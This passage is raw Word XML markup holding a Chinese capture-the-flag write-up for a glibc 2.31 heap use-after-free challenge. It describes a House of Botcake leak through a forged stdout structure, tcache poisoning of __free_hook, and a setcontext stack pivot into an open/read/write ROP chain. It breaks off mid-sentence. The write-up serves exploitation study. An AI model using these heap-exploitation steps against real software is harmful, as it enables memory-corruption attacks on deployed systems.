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3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本题是一道基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> glibc 2.31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本的堆溢出利用题目。交互菜单中仅开放了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> add、delete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> edit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这三项常规操作，刻意剥离了用于回显的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">功能。在执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> delete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">释放对应的堆块时，程序并没有将底层的指针及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据清空；同时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> edit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制依然允许对处于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> freed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行写入，从而直接暴露出一个能够被随意操纵的典型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UAF（Use-After-Free）漏洞。此外，程序部署了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seccomp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">沙箱规则，其白名单限制了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> syscall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的执行，仅仅放行了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> open/read/write </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等极个别的系统调用。因此，我们别无他法，只能通过构建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ORW </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行流来读取并打印出最终的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存分配方面，程序预留了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> slot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">空位，允许用户申请的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> size </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阈值位于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1024 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之间，这就意味着所有合法的申请尺寸都被完全涵盖在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的管辖范畴之内。程序的安全编译防御机制处于全开状态（包含了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Full RELRO、Canary、NX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</w:rPr>
        <w:t xml:space="preserve">PIE）。由于缺失了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打印机制，常规的直接读取堆内残留数据的方法失效，我们必须转变思路，依靠伪造及篡改底层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stdout FILE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构体来强行逼迫程序泄露出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的真实基址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基址的泄露阶段（Phase</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1），核心手法是利用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> House of Botcake </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术的一种变体。第一步，先向系统申请两个物理相邻的堆块——A（大小为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">B（大小为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0xa0），并在操作前将其对应大小的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链表预先填满。紧接着，我们释放堆块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A，让其自然掉落至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unsorted bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当中，而后释放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引发内存的向后合并，从而拼凑出一个体积达</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0x130 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的巨型合并块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AB。随后的操作是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> drain tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以清空该链表，并借助前述的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞对块</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起二次</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">free，将其强行挂载回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">里面。此时，chunk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">便拥有了双重身份：既是被包裹在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unsorted bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大块中的一部分，又活跃于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链表中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当我们尝试触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unsorted bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> split </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制去分配一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0x88 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大小的内存块时，切割后残余的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remainder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位置十分巧合地落在原来的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处。在此机制下，glibc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会主动把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">arena+96 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">的地址填充至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> B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fd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">属性内。鉴于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> chunk B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">依然存在于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">结构里，我们可以利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">达成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> partial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite（部分覆写），将其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> fd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">指针的末尾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个字节篡改为指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> `</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">stdout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（这一步需要承担</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1/16 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的概率去爆破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nibble）。完成修改后，只需连续发起两次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x98 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">大小的分配请求，即可在第二次顺利劫持到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stdout。接着，通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> stdout </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构内布置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">flags=0xfbad1800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并将所有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关指针全部抹零，配合对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">write_base` </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的最低字节实施为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> partial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite，便能成功触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flush </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作，顺利实现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内存基址的泄露。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在成功掌握</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基址之后，利用链转入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Phase 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段。我们使用了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">轮针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcache[0x90]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> poisoning </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">污染手法，把准备好的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据分段式地布入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__free_hook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附近的内存中。需要特别留意的是，之前为了泄露地址而残留在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unsorted bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> remainder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">已经被严重破坏，为了规避系统在后续分配时遍历该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进而引发程序</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的风险，其后的每一笔内存申请都必须严格地约束在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tcache </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内部执行。具体的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">植入分为三个批次完成：首轮写入是对准</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free_hook+0x110</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处，主要填入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行链的尾端以及必需的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路径字符串；次轮则聚焦于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free_hook+0x88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，负责把</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setcontext frame </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结构的下半部分和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链的头部布置妥当；最后一轮则是直击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free_hook+0x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">处，精准打入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> magic_gadget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setcontext+61 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的绝对地址，至此，针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hook </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的劫持部署便大功告成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终的执行流触发极为清晰：直接调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">free(trigger_chunk)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进而顺畅地切入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">magic_gadget（对应的底层汇编是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mov rdx,[rdi+8]; call [rdx+0x20]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。这会导致程序跳跃至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">setcontext+61</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址处，依托</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rdx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">寄存器载入我们在前面伪造好的寄存器上下文数据，从而达成栈迁移（Stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivot）的战术目标。当这一套流转结束后，程序便会忠实地践行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open("./flag") -&gt; read -&gt; write</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
